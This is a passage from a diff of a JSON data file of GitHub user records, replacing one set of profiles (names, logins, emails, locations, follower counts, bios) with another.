"bio": "", + "following_count": 11, + "followers_count": 411, + "public_gists_count": 45, + "public_repositories_count": 232, + "created_at": "2009-12-19T06:07:30Z", + "updated_at": "2024-09-20T14:24:12Z", + "node_id": "MDQ6VXNlcjE2OTcwNw==", + "bio": "Christian, parent, husband, creator of Moq and other developer tools and libraries. Also known as 'kzu' (like 'kah-zu' rather than 'kzoo' :))", "is_hireable": false, - "twitter_username": "" + "twitter_username": "kzu" } }, { "model": "github.user", - "pk": 1713, + "pk": 7009, "fields": { - "nest_created_at": "2024-09-12T00:24:50.620Z", - "nest_updated_at": "2024-09-12T00:24:50.620Z", - "name": "Christof Dallermassl", - "login": "cdaller", - "email": "christof@dallermassl.at", - "avatar_url": "https://avatars.githubusercontent.com/u/1531978?v=4", - "company": "43bits", - "location": "Graz, Austria", + "nest_created_at": "2024-09-22T08:34:44.902Z", + "nest_updated_at": "2024-09-22T18:51:58.498Z", + "name": "Dane Powell", + "login": "danepowell", + "email": "git@danepowell.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1984514?v=4", + "company": "@acquia ", + "location": "San Diego", "collaborators_count": 0, "following_count": 0, - "followers_count": 9, - "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2012-03-13T08:17:25Z", - "updated_at": "2024-09-02T19:44:58Z", - "node_id": "MDQ6VXNlcjE1MzE5Nzg=", + "followers_count": 38, + "public_gists_count": 6, + "public_repositories_count": 176, + "created_at": "2012-07-16T13:42:51Z", + "updated_at": "2024-09-06T19:02:57Z", + "node_id": "MDQ6VXNlcjE5ODQ1MTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403078,99 +661152,99 @@ }, { "model": "github.user", - "pk": 1714, + "pk": 7010, "fields": { - "nest_created_at": "2024-09-12T00:24:51.881Z", - "nest_updated_at": "2024-09-12T00:25:07.557Z", - "name": "", - "login": "DanielOstovary", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45196419?v=4", - "company": "", + "nest_created_at": "2024-09-22T08:34:45.229Z", + "nest_updated_at": "2024-09-22T18:51:58.807Z", + "name": "Dan Čermák", + "login": "dcermak", + "email": "dcermak@suse.com", + "avatar_url": "https://avatars.githubusercontent.com/u/45594031?v=4", + "company": "@SUSE", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-11-20T08:59:23Z", - "updated_at": "2021-08-11T11:34:47Z", - "node_id": "MDQ6VXNlcjQ1MTk2NDE5", + "following_count": 28, + "followers_count": 49, + "public_gists_count": 5, + "public_repositories_count": 202, + "created_at": "2018-12-04T11:17:16Z", + "updated_at": "2024-09-17T11:48:19Z", + "node_id": "MDQ6VXNlcjQ1NTk0MDMx", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "DefolosDC" } }, { "model": "github.user", - "pk": 1715, + "pk": 7011, "fields": { - "nest_created_at": "2024-09-12T00:24:56.037Z", - "nest_updated_at": "2024-09-12T00:24:56.037Z", - "name": "Sven Filatov", - "login": "svenfila", + "nest_created_at": "2024-09-22T08:34:45.543Z", + "nest_updated_at": "2024-09-22T18:51:59.123Z", + "name": "Dan Spiteri", + "login": "TruDan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/303024?v=4", - "company": "Wise", - "location": "Tartu, Estonia", + "avatar_url": "https://avatars.githubusercontent.com/u/983207?v=4", + "company": "TruDev", + "location": "The Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2010-06-11T19:00:20Z", - "updated_at": "2023-03-12T13:36:49Z", - "node_id": "MDQ6VXNlcjMwMzAyNA==", + "following_count": 9, + "followers_count": 51, + "public_gists_count": 7, + "public_repositories_count": 98, + "created_at": "2011-08-16T10:02:48Z", + "updated_at": "2024-08-06T09:00:32Z", + "node_id": "MDQ6VXNlcjk4MzIwNw==", "bio": "", "is_hireable": false, - "twitter_username": "svenfila" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1716, + "pk": 7012, "fields": { - "nest_created_at": "2024-09-12T00:24:57.231Z", - "nest_updated_at": "2024-09-12T00:24:57.231Z", - "name": "Juan Pablo Pidal López", - "login": "papidal", - "email": "juanpdl@servicioexterno.inditex.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1620855?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:45.857Z", + "nest_updated_at": "2024-09-22T18:51:59.479Z", + "name": "Dan Korostelev", + "login": "nadako", + "email": "nadako@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/49749?v=4", + "company": "@innogames ", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2012-04-07T09:57:59Z", - "updated_at": "2024-05-07T13:53:14Z", - "node_id": "MDQ6VXNlcjE2MjA4NTU=", + "following_count": 49, + "followers_count": 209, + "public_gists_count": 57, + "public_repositories_count": 103, + "created_at": "2009-01-27T20:53:58Z", + "updated_at": "2024-09-18T09:00:49Z", + "node_id": "MDQ6VXNlcjQ5NzQ5", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1717, + "pk": 7013, "fields": { - "nest_created_at": "2024-09-12T00:24:58.039Z", - "nest_updated_at": "2024-09-12T00:24:58.039Z", - "name": "Steven Swor", - "login": "sworisbreathing", + "nest_created_at": "2024-09-22T08:34:46.202Z", + "nest_updated_at": "2024-09-22T18:51:59.808Z", + "name": "Dan Casey", + "login": "dancasey", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1486524?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6557149?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 6, - "public_repositories_count": 31, - "created_at": "2012-02-29T21:04:00Z", - "updated_at": "2024-07-19T02:58:09Z", - "node_id": "MDQ6VXNlcjE0ODY1MjQ=", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2014-01-31T20:34:57Z", + "updated_at": "2024-09-21T20:31:58Z", + "node_id": "MDQ6VXNlcjY1NTcxNDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403178,149 +661252,149 @@ }, { "model": "github.user", - "pk": 1718, + "pk": 7014, "fields": { - "nest_created_at": "2024-09-12T00:24:58.845Z", - "nest_updated_at": "2024-09-12T00:24:58.845Z", - "name": "Rodrigo", - "login": "romedeiro", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29693430?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:46.512Z", + "nest_updated_at": "2024-09-22T18:52:00.115Z", + "name": "Damian Edwards", + "login": "DamianEdwards", + "email": "damian@damianedwards.com", + "avatar_url": "https://avatars.githubusercontent.com/u/249088?v=4", + "company": "@microsoft ", + "location": "Redmond, WA", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2017-06-25T18:53:58Z", - "updated_at": "2024-08-29T17:16:01Z", - "node_id": "MDQ6VXNlcjI5NjkzNDMw", - "bio": "", + "followers_count": 3541, + "public_gists_count": 62, + "public_repositories_count": 93, + "created_at": "2010-04-21T15:25:16Z", + "updated_at": "2024-09-20T16:46:49Z", + "node_id": "MDQ6VXNlcjI0OTA4OA==", + "bio": "PM Architect on the .NET team at Microsoft.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "damianedwards" } }, { "model": "github.user", - "pk": 1719, + "pk": 7015, "fields": { - "nest_created_at": "2024-09-12T00:24:59.693Z", - "nest_updated_at": "2024-09-12T00:24:59.693Z", - "name": "", - "login": "RobertPaasche", + "nest_created_at": "2024-09-22T08:34:46.826Z", + "nest_updated_at": "2024-09-22T18:52:00.431Z", + "name": "Cyrille Tuzi", + "login": "cyrilletuzi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6502079?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/555867?v=4", "company": "", - "location": "", + "location": "Paris (France)", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-01-25T19:15:34Z", - "updated_at": "2022-03-23T10:13:17Z", - "node_id": "MDQ6VXNlcjY1MDIwNzk=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "followers_count": 120, + "public_gists_count": 333, + "public_repositories_count": 8, + "created_at": "2011-01-10T16:30:07Z", + "updated_at": "2024-09-13T11:33:38Z", + "node_id": "MDQ6VXNlcjU1NTg2Nw==", + "bio": "Angular, Ionic, TypeScript expert / tech lead developer / staff engineer. Also Node and Deno. Rust training in progress.", + "is_hireable": true, + "twitter_username": "cyrilletuzi" } }, { "model": "github.user", - "pk": 1720, + "pk": 7016, "fields": { - "nest_created_at": "2024-09-12T00:25:00.545Z", - "nest_updated_at": "2024-09-12T00:25:00.545Z", - "name": "jjYBdx4IL", - "login": "jjYBdx4IL", + "nest_created_at": "2024-09-22T08:34:47.137Z", + "nest_updated_at": "2024-09-22T18:52:00.751Z", + "name": "Cory Li", + "login": "Cixelyn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/491220?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51144?v=4", + "company": "@sizigi ", + "location": "San Francisco, CA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 6, - "public_gists_count": 4, - "public_repositories_count": 111, - "created_at": "2010-11-22T01:58:57Z", - "updated_at": "2024-08-30T08:18:26Z", - "node_id": "MDQ6VXNlcjQ5MTIyMA==", - "bio": "C++/C/Java dev.", + "following_count": 12, + "followers_count": 66, + "public_gists_count": 2, + "public_repositories_count": 46, + "created_at": "2009-02-02T16:06:04Z", + "updated_at": "2024-08-17T08:52:54Z", + "node_id": "MDQ6VXNlcjUxMTQ0", + "bio": "AI engineering @sizigi", "is_hireable": true, - "twitter_username": "" + "twitter_username": "Cixelyn" } }, { "model": "github.user", - "pk": 1721, + "pk": 7017, "fields": { - "nest_created_at": "2024-09-12T00:25:02.206Z", - "nest_updated_at": "2024-09-12T00:25:02.206Z", - "name": "Sven Vowe", - "login": "nuclearglow", - "email": "svenvowe@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1580357?v=4", + "nest_created_at": "2024-09-22T08:35:02.749Z", + "nest_updated_at": "2024-09-22T18:52:16.076Z", + "name": "Pooyan Razian", + "login": "prazian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10402655?v=4", "company": "", - "location": "Europe", + "location": "Copenhagen, Denmark", "collaborators_count": 0, - "following_count": 11, - "followers_count": 13, - "public_gists_count": 24, - "public_repositories_count": 35, - "created_at": "2012-03-27T16:09:57Z", - "updated_at": "2024-09-09T11:30:37Z", - "node_id": "MDQ6VXNlcjE1ODAzNTc=", - "bio": "Full Stack Developer", + "following_count": 7, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2015-01-05T14:51:56Z", + "updated_at": "2024-09-18T12:40:21Z", + "node_id": "MDQ6VXNlcjEwNDAyNjU1", + "bio": "Full-stack-overflow cloud architect ™\r\n\r\nConverting code to the cloud!", "is_hireable": false, - "twitter_username": "" + "twitter_username": "pooyan_razian" } }, { "model": "github.user", - "pk": 1722, + "pk": 7018, "fields": { - "nest_created_at": "2024-09-12T00:25:03.486Z", - "nest_updated_at": "2024-09-12T00:25:03.486Z", - "name": "Stephan Markwalder", - "login": "smarkwal", + "nest_created_at": "2024-09-22T08:35:03.082Z", + "nest_updated_at": "2024-09-22T18:52:16.386Z", + "name": "Thibault NORMAND", + "login": "Zenithar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48734492?v=4", - "company": "", - "location": "Zurich, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/3110?v=4", + "company": "@DataDog", + "location": "Toulouse, France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2019-03-19T20:08:27Z", - "updated_at": "2024-06-30T08:54:51Z", - "node_id": "MDQ6VXNlcjQ4NzM0NDky", - "bio": "", + "following_count": 81, + "followers_count": 117, + "public_gists_count": 52, + "public_repositories_count": 167, + "created_at": "2008-03-14T16:37:48Z", + "updated_at": "2024-05-31T07:22:23Z", + "node_id": "MDQ6VXNlcjMxMTA=", + "bio": "Passionated cyber security engineer, actor in free software world.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1723, + "pk": 7019, "fields": { - "nest_created_at": "2024-09-12T00:25:04.679Z", - "nest_updated_at": "2024-09-12T00:25:04.680Z", - "name": "Saúl Piña", - "login": "sauljabin", + "nest_created_at": "2024-09-22T08:35:11.067Z", + "nest_updated_at": "2024-09-22T18:52:23.674Z", + "name": "Darren McConnell", + "login": "Darren8098", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5039802?v=4", - "company": "@littlehorse-enterprises", - "location": "Quito, Ecuador", + "avatar_url": "https://avatars.githubusercontent.com/u/26058326?v=4", + "company": "", + "location": "Barcelona", "collaborators_count": 0, - "following_count": 104, - "followers_count": 88, + "following_count": 5, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2013-07-18T13:56:05Z", - "updated_at": "2024-09-03T22:15:24Z", - "node_id": "MDQ6VXNlcjUwMzk4MDI=", + "public_repositories_count": 5, + "created_at": "2017-02-27T09:35:38Z", + "updated_at": "2024-09-10T11:21:22Z", + "node_id": "MDQ6VXNlcjI2MDU4MzI2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403328,224 +661402,199 @@ }, { "model": "github.user", - "pk": 1724, + "pk": 7020, "fields": { - "nest_created_at": "2024-09-12T00:25:06.322Z", - "nest_updated_at": "2024-09-12T00:25:06.322Z", - "name": "", - "login": "abvedire", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49322811?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:35:22.891Z", + "nest_updated_at": "2024-09-22T18:52:35.952Z", + "name": "Julio Jimenez", + "login": "juliojimenez", + "email": "julio@julioj.com", + "avatar_url": "https://avatars.githubusercontent.com/u/648113?v=4", + "company": "Julio Jimenez", + "location": "Fayetteville, NC", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-04-05T19:41:01Z", - "updated_at": "2019-04-05T19:43:32Z", - "node_id": "MDQ6VXNlcjQ5MzIyODEx", + "following_count": 4, + "followers_count": 28, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2011-03-03T01:12:38Z", + "updated_at": "2024-09-21T00:14:50Z", + "node_id": "MDQ6VXNlcjY0ODExMw==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1725, + "pk": 7021, "fields": { - "nest_created_at": "2024-09-12T00:25:08.772Z", - "nest_updated_at": "2024-09-12T00:25:08.772Z", - "name": "", - "login": "christopher-gill", + "nest_created_at": "2024-09-22T08:35:29.437Z", + "nest_updated_at": "2024-09-22T18:53:32.360Z", + "name": "Ian Dunbar-Hall", + "login": "idunbarh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10129886?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100151740?v=4", + "company": "@lmco", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-12-09T13:22:18Z", - "updated_at": "2022-12-05T09:51:02Z", - "node_id": "MDQ6VXNlcjEwMTI5ODg2", - "bio": "", + "public_repositories_count": 21, + "created_at": "2022-02-21T16:25:46Z", + "updated_at": "2024-09-08T00:17:52Z", + "node_id": "U_kgDOBfgxvA", + "bio": "Lockheed Martin Open Source Program Office", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1726, + "pk": 7022, "fields": { - "nest_created_at": "2024-09-12T00:25:10.395Z", - "nest_updated_at": "2024-09-12T00:25:19.709Z", - "name": "James Ratzlaff", - "login": "jamesratzlaff", + "nest_created_at": "2024-09-22T08:35:30.111Z", + "nest_updated_at": "2024-09-22T18:52:43.163Z", + "name": "Manoj Prasad", + "login": "dasarpjonam", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3743806?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1389513?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 24, - "created_at": "2013-03-02T00:11:59Z", - "updated_at": "2024-04-03T19:45:44Z", - "node_id": "MDQ6VXNlcjM3NDM4MDY=", - "bio": "", + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-01-29T18:34:50Z", + "updated_at": "2024-08-27T14:13:41Z", + "node_id": "MDQ6VXNlcjEzODk1MTM=", + "bio": "Security, Risk and Compliance @ Aloft\r\n#supplychainsecurity #MLsec #owasp #cyclonedx", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1727, + "pk": 7023, "fields": { - "nest_created_at": "2024-09-12T00:25:11.597Z", - "nest_updated_at": "2024-09-12T00:25:11.597Z", - "name": "Mario DeSousa", - "login": "mdesousa", + "nest_created_at": "2024-09-22T08:36:10.126Z", + "nest_updated_at": "2024-09-22T18:53:22.089Z", + "name": "IBM Open Source Bot", + "login": "ibm-open-source-bot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1141403?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66631603?v=4", + "company": "@IBM", + "location": "::1", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2011-10-20T18:03:24Z", - "updated_at": "2024-03-18T22:04:11Z", - "node_id": "MDQ6VXNlcjExNDE0MDM=", - "bio": "", + "following_count": 0, + "followers_count": 86, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-06-08T14:45:03Z", + "updated_at": "2023-05-25T13:59:35Z", + "node_id": "MDQ6VXNlcjY2NjMxNjAz", + "bio": "A Bot to help @IBM open source projects and be a good citizen for our Open Source Communities.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "IBMDeveloper" } }, { "model": "github.user", - "pk": 1728, + "pk": 7024, "fields": { - "nest_created_at": "2024-09-12T00:25:13.246Z", - "nest_updated_at": "2024-09-12T00:25:27.980Z", - "name": "Thibaut SEVERAC", - "login": "thib3113", - "email": "thib3113@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5489218?v=4", - "company": "@centreon", - "location": "Toulouse France", + "nest_created_at": "2024-09-22T08:36:10.455Z", + "nest_updated_at": "2024-09-22T18:53:22.405Z", + "name": "JJ Asghar", + "login": "jjasghar", + "email": "awesome@ibm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/810824?v=4", + "company": "IBM", + "location": "Austin, Texas", "collaborators_count": 0, - "following_count": 15, - "followers_count": 21, - "public_gists_count": 5, - "public_repositories_count": 79, - "created_at": "2013-09-18T18:55:50Z", - "updated_at": "2024-08-23T08:12:47Z", - "node_id": "MDQ6VXNlcjU0ODkyMTg=", - "bio": "Centreon Developper / OSS developper", + "following_count": 95, + "followers_count": 325, + "public_gists_count": 70, + "public_repositories_count": 198, + "created_at": "2011-05-25T21:55:33Z", + "updated_at": "2024-09-22T18:34:15Z", + "node_id": "MDQ6VXNlcjgxMDgyNA==", + "bio": "Father, Husband, Eagle Scout, Beer Nerd, and Computer Nerd. I work as a Developer Advocate for IBM.", "is_hireable": false, - "twitter_username": "thib3113" + "twitter_username": "jjasghar" } }, { "model": "github.user", - "pk": 1729, + "pk": 7025, "fields": { - "nest_created_at": "2024-09-12T00:25:15.640Z", - "nest_updated_at": "2024-09-12T00:25:15.640Z", - "name": "SeA75", - "login": "SeA75", + "nest_created_at": "2024-09-22T08:36:11.093Z", + "nest_updated_at": "2024-09-22T18:53:23.078Z", + "name": "Wellington Anthony Johnson II", + "login": "ajistrying", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17384582?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/50687671?v=4", "company": "", - "location": "", + "location": "Atlanta, GA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-02-21T15:39:53Z", - "updated_at": "2023-05-10T14:03:30Z", - "node_id": "MDQ6VXNlcjE3Mzg0NTgy", - "bio": "", + "following_count": 26, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2019-05-16T02:58:03Z", + "updated_at": "2024-09-19T21:29:18Z", + "node_id": "MDQ6VXNlcjUwNjg3Njcx", + "bio": "Building stuff", "is_hireable": false, - "twitter_username": "" + "twitter_username": "wellingtonajo" } }, { "model": "github.user", - "pk": 1730, + "pk": 7026, "fields": { - "nest_created_at": "2024-09-12T00:25:16.926Z", - "nest_updated_at": "2024-09-12T00:25:16.926Z", - "name": "Eric", - "login": "ericbram", + "nest_created_at": "2024-09-22T08:36:17.912Z", + "nest_updated_at": "2024-09-22T18:53:29.804Z", + "name": "Kasun Kumara Ranawaka", + "login": "kakumara", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6936019?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6473228?v=4", "company": "", - "location": "Salem, MA", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, + "following_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2014-03-13T01:24:09Z", - "updated_at": "2024-08-24T15:25:52Z", - "node_id": "MDQ6VXNlcjY5MzYwMTk=", - "bio": "Senior CI/CD Engineer", + "public_repositories_count": 10, + "created_at": "2014-01-22T16:36:44Z", + "updated_at": "2024-04-19T13:21:30Z", + "node_id": "MDQ6VXNlcjY0NzMyMjg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1731, + "pk": 7027, "fields": { - "nest_created_at": "2024-09-12T00:25:18.480Z", - "nest_updated_at": "2024-09-12T00:25:18.480Z", - "name": "Kevin Kessenich", - "login": "kessenich", + "nest_created_at": "2024-09-22T08:36:20.152Z", + "nest_updated_at": "2024-09-22T18:53:32.057Z", + "name": "Brad Hards", + "login": "bradh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27139487?v=4", - "company": "", - "location": "Germany", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2017-04-09T11:45:14Z", - "updated_at": "2024-04-22T07:09:36Z", - "node_id": "MDQ6VXNlcjI3MTM5NDg3", - "bio": "Interested in web development with popular frameworks like Angular and React. Frontend is not enough, so as backend technologies I like .NET, NodeJS and Java", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1732, - "fields": { - "nest_created_at": "2024-09-12T00:25:20.939Z", - "nest_updated_at": "2024-09-12T00:25:20.939Z", - "name": "Patrick Kaeding", - "login": "pkaeding", - "email": "patrick@kaeding.name", - "avatar_url": "https://avatars.githubusercontent.com/u/13951?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/174642?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 19, - "public_gists_count": 4, - "public_repositories_count": 47, - "created_at": "2008-06-16T20:37:10Z", - "updated_at": "2024-08-05T15:52:53Z", - "node_id": "MDQ6VXNlcjEzOTUx", + "following_count": 47, + "followers_count": 51, + "public_gists_count": 2, + "public_repositories_count": 361, + "created_at": "2009-12-31T11:47:43Z", + "updated_at": "2024-09-05T11:24:28Z", + "node_id": "MDQ6VXNlcjE3NDY0Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403553,24 +661602,24 @@ }, { "model": "github.user", - "pk": 1733, + "pk": 7028, "fields": { - "nest_created_at": "2024-09-12T00:25:22.225Z", - "nest_updated_at": "2024-09-12T00:25:22.225Z", - "name": "Andreas Mandel", - "login": "amandel", + "nest_created_at": "2024-09-22T08:36:21.771Z", + "nest_updated_at": "2024-09-22T18:53:33.630Z", + "name": "", + "login": "tamir-alltrue-ai", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/593340?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/144076741?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 15, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2011-01-31T19:21:13Z", - "updated_at": "2024-08-14T09:55:41Z", - "node_id": "MDQ6VXNlcjU5MzM0MA==", + "public_repositories_count": 4, + "created_at": "2023-09-05T01:05:37Z", + "updated_at": "2024-07-02T13:36:18Z", + "node_id": "U_kgDOCJZvxQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403578,24 +661627,24 @@ }, { "model": "github.user", - "pk": 1734, + "pk": 7029, "fields": { - "nest_created_at": "2024-09-12T00:25:23.482Z", - "nest_updated_at": "2024-09-12T00:25:23.483Z", + "nest_created_at": "2024-09-22T08:36:36.077Z", + "nest_updated_at": "2024-09-22T19:24:32.294Z", "name": "", - "login": "jmorte1", + "login": "merry-degaga", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56366723?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/97123508?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-10-09T19:37:04Z", - "updated_at": "2019-10-09T19:37:05Z", - "node_id": "MDQ6VXNlcjU2MzY2NzIz", + "public_repositories_count": 3, + "created_at": "2022-01-04T18:38:35Z", + "updated_at": "2023-11-13T13:16:13Z", + "node_id": "U_kgDOBcn8tA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403603,24 +661652,24 @@ }, { "model": "github.user", - "pk": 1735, + "pk": 7030, "fields": { - "nest_created_at": "2024-09-12T00:25:25.539Z", - "nest_updated_at": "2024-09-12T00:25:25.539Z", - "name": "Rand Hillerøe", - "login": "Silwing", + "nest_created_at": "2024-09-22T08:36:36.398Z", + "nest_updated_at": "2024-09-22T18:53:48.235Z", + "name": "Duy", + "login": "Duy-L", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/186144?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/51868756?v=4", "company": "", - "location": "", + "location": "SF", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, + "following_count": 4, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2010-01-20T12:02:31Z", - "updated_at": "2024-08-06T12:01:09Z", - "node_id": "MDQ6VXNlcjE4NjE0NA==", + "public_repositories_count": 6, + "created_at": "2019-06-16T01:47:33Z", + "updated_at": "2023-10-16T16:42:30Z", + "node_id": "MDQ6VXNlcjUxODY4NzU2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403628,74 +661677,74 @@ }, { "model": "github.user", - "pk": 1736, + "pk": 7031, "fields": { - "nest_created_at": "2024-09-12T00:25:26.745Z", - "nest_updated_at": "2024-09-12T00:25:26.745Z", - "name": "Armando Sosa", - "login": "ajsosa", + "nest_created_at": "2024-09-22T08:36:37.028Z", + "nest_updated_at": "2024-09-22T18:53:48.885Z", + "name": "Leption", + "login": "lejara", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41923324?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16671822?v=4", "company": "", - "location": "", + "location": "Canada", "collaborators_count": 0, - "following_count": 1, - "followers_count": 6, + "following_count": 3, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2018-07-30T17:47:58Z", - "updated_at": "2024-09-04T18:05:16Z", - "node_id": "MDQ6VXNlcjQxOTIzMzI0", + "public_repositories_count": 30, + "created_at": "2016-01-12T18:07:34Z", + "updated_at": "2024-06-30T06:40:06Z", + "node_id": "MDQ6VXNlcjE2NjcxODIy", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "Leption_LJ" } }, { "model": "github.user", - "pk": 1737, + "pk": 7032, "fields": { - "nest_created_at": "2024-09-12T00:25:29.631Z", - "nest_updated_at": "2024-09-12T00:25:29.631Z", - "name": "Matthew Bates", - "login": "LinkMJB", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8824103?v=4", - "company": "IBM", - "location": "Tucson, AZ", + "nest_created_at": "2024-09-22T08:36:37.345Z", + "nest_updated_at": "2024-09-22T18:53:49.192Z", + "name": "Prince Mendiratta", + "login": "Prince-Mendiratta", + "email": "prince.mendi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/54077356?v=4", + "company": "Delhi Technological University", + "location": "New Delhi", "collaborators_count": 0, - "following_count": 12, - "followers_count": 6, - "public_gists_count": 1, - "public_repositories_count": 35, - "created_at": "2014-09-18T18:34:00Z", - "updated_at": "2024-06-12T20:42:56Z", - "node_id": "MDQ6VXNlcjg4MjQxMDM=", - "bio": "all your bateses are belong to us", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 5, + "public_repositories_count": 128, + "created_at": "2019-08-13T17:22:02Z", + "updated_at": "2024-09-18T06:19:51Z", + "node_id": "MDQ6VXNlcjU0MDc3MzU2", + "bio": "Github AIR#6 | DTU, COE'24 | Building Creatr | Coding Fanatic. Fame is temporary, learning is forever.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1738, + "pk": 7033, "fields": 